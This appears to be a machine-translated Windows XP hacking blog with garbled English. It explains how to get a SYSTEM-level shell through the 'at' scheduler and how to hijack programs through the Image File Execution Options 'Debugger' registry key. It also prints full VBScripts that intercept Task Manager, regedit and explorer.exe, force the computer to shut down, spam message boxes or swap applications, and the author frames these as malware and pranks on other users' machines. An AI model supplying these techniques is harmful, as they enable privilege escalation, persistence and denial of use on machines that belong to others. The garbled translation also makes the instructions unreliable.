In some systems, it can only be done through the Registry. Go to "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ IniFileMapping" and create a button named "Autorun.inf".

Friday, January 1, 2010

login to windows XP as a "system"

plenty of people who think that a user with the highest privileges is administrator only. because the user admin is in the trust can solve almost any problem. but the assumption is wrong, because the user with the highest privileges in the window system is the user system.

I have a question for you all, how do I log into the system? (Users 100% free).
- Via the user account is still wrong really.
- Through the registry is not as well.
- Via bruteforce actually not true.
- Via the command prompt if this means that once the new 100% correct.

Just go straight to the topic of his mind:
1. open command prompt
2. Start - Run - cmd.exe - enter
3. you type the command below then you exit the command prompt program.

code: at xx: xx / interactive cmd.exe

with a code of xx: xx is that the code indicates the time when the program your computer to the command prompt run as a system. I usually fill with 1 minute after the hour now. example: 03.00 hours so now I am content with the time 03.01.

- Wait until the command prompt appears with the title c: \\ windows \\ system32 \\ svchost. but it was not a command prompt
- Then you are not a task manager (ctrl + alt + delete / del)
- Open the tab on the processor in task manager and click on "explorer.exe".
now your computer taskbar will disappear and let desktop well and do not in close task manager. because the task manager's user interface system with your user at the time.
- Back to the command prompt
- Type "explorer.exe" warning not to close the command prompt.
- Now taskbar will appear and desktop too. but it will be quite different from the previous one.

with tips and tricks this time you can access all places, all the directories, all registry keys, and they're all here all you can even access the computer without any limits, but is deliberately making the system user can not access.

to return to the previous user and tricks this tip:
- You directly to the command prompt
- Type the following command
code: tskill explorer.exe

if the first order problems that you can use this:
- Task manager
- On the first tab and then you click the new process
- Then you are content with the "explorer.exe"

if you are satisfied you can close task manager and command prompt.
hopefully useful to you all.

Wednesday, December 30, 2009

manipulation of an application window

a tip and trick that is rarely used by the skill or master computer. a tip and trick manipulation this application is not paid manipulation application or free, but sort manipulation this application is running with a ms.word program command winword.exe, excel, or you run IE (internet explorer) but the road is a bad tip and very unique.

the most to the tip and the tip of this trick can be used on the window, even tip no longer is any additional applications. capital is only 99% window (30% and 70% registry script) and 1% using scripting intelligence.

manipulation tip is very well suited to some of those activities as follows:
1. admin who did not want the kind client - kind of.
2. they use the computer together (cafes, computer courses) but did not want certain programs run.
3. personal computers but is very afraid of the brain - manipulate other people or younger.
4. want be different with friends.
5. like ignorant friends or often idle
6. often try to - try

you should know that we will play with the script and the registry. which means quite dangerous if you do not follow the steps - steps from me. and you watch carefully and step by step. If you still do not understand or do not understand you should not directly apply tips and tricks below will result in enough trouble. but when it clearly and understand the tips and please continue with the next trick.

some word
every time you run the program, then the window will check or control of registry keys.

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\

the subkey of the file name and not paths. subkey will be equated with the name that will run progrma. if the same, it will check the string "Debugger". and if the string is the window will run the program in accordance with the contents of the string. try you see below:

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ taskmgr.exe

empty contents you see this image above. so if you run taskmgr.exe from the RUN menu in any EXE location. the program will run no matter the parth or another. but taskmgr.exe subkey contains the string "Debugger" see the picture below.

and the string value "C: \\ Program Files \\ Microsoft Office \\ Office11 \\ WinWord.exe". then each run RUN tasmgr.exe from the menu or from the other tasks that appear not manager instead ms.word.

an application:
with a very simple way as above is enough time to run a malicious intent. yagn as I explained the above, the window will check the existence of the string "debugger" and read the contents to run programs on purpose. but what would happen if the contents of the string "Debugger" in the blank? if nothing happened - what was the try despite a thousand times is not going the way malicious applications. but you do not worry about this tip and trick will not stop here it is still a long way to make our malware and good step if you know about the VBS script.

how to scare computer users:
for example there are users who want ignorant run task manager with CTRL + ALT + DEL, you try to fill the string "Debugger" with "wscript c: \\ skrip.vbs" without the quotes yes.
then you run a note and type the code below:
code: MsgBox ( "How dare you ignorant my computer! it was recorded! who have a computer then going mad !!!")

or the actual format below:
MsgBox ( "message")

then save the file in "C: \\" with the name "skrip.vbs" (unless you set yourself)
now try run task manager.

Make a password to run things
If you want to install the password for the program (eg) task manager, the "Debugger" content with\u003e\u003e "wscript.exe c: \\ skrip.vbs" (without the quotation marks, too)

then type the following script in notepad.

Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
If s = "PASSWORD" Then
  set wscr=CreateObject("WScript.Shell")
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger","wscript C:\skrip.vbs","REG_SZ"
  Msgbox("Awas kalo coba-coba maen-maen dengan komputer ini!!!")
End IF

then save with the name "skrip.vbs" in C: \\

and IF you want to make a regedit password, live for a new key with the name "regedit" (do not say forget the place. go try to check the above)
then make a string "debugger" and fill with "wscript c: \\ skrip.vbs" (still without the quotes)
contents same as above ... but replace the "wscr.exec (taskmgr.exe)" replaced "wscr.exec (regedit.exe)"
so if password other files ...

if you want to change the password ... clay third row ... PASSWORD said that you replace like-like you is ...
WARNING! Case sensitive password!

Super Security
This time the game was still in VBScript ... a security that can barely broken ... Login PASSWORD SUPER-BAD!

Each run windows, then the application is first run and was followed NTOSKRNL winlogon and result in EXPLORER.
your evil thoughts would lead to "change the debugger to winlogon.exe" ... It's too bad ... now I give a little better: Explorer.
Essentially every time you enter a password window will be prompted by this little program. and if the wrong password, windows will Shutdown!
quite bad right.

Step by Step Procedure

1. Notepad
type the following script

Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
set wscr=CreateObject("WScript.Shell")
If s = "PASSWORD" Then
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger","wscript C:\muncul.vbs","REG_SZ"
  Msgbox("Berani ya!!! awas kamu!!!")
  wscr.exec("shutdown -s -f -t 00")
End IF

save with the name "C: \\ muncul.vbs"

2. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe

3. string debugger
in the key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe
for the string "debugger" and fill with "wscript c: \\ muncul.vbs"

4. done
please try restarting your computer and feel Khasiatnya ^ ^

Change the way the program
still remember most of the writing? jalanin the way MS Word MS Excel instead it loh ...
This time I beberin how ...

1. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ winword.exe

2. string
in key winword.exe, make the string "debugger" and then fill with
"c: \\ Program Files \\ Microsoft Office \\ OFFICE11 \\ EXCEL.EXE" with quotation marks (because there are spaces. if no yes no spaces need quotes)

3. done
run the word ... which appears even excel
most evil tricks. Change the program that works with the script!
returned to the VBS mode ...
follow the step above (the word so excel). but debugger replaced so "wscript (jahil.vbs)" (without the quotes )
This script contents jahil.vbs

set wscr=CreateObject("WScript.Shell")
Msgbox("A Ghost has attacked this computer. This computer may result an invalid execution. Contact your Ghostbusters for more information.")
dim i
for i=0 to 100
   msgbox "Ayo bermain tekan enter 100x! Anda harus menekannya " & 100 - i & "x lagi"
msgbox "Gooooooooooooooooooood Byeeeeeeeeeeeeeeee!!!!!"
wscr.exec("c:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE")

 save with the name "C: \\ jahil.vbs" then run the word ... enjoy tapping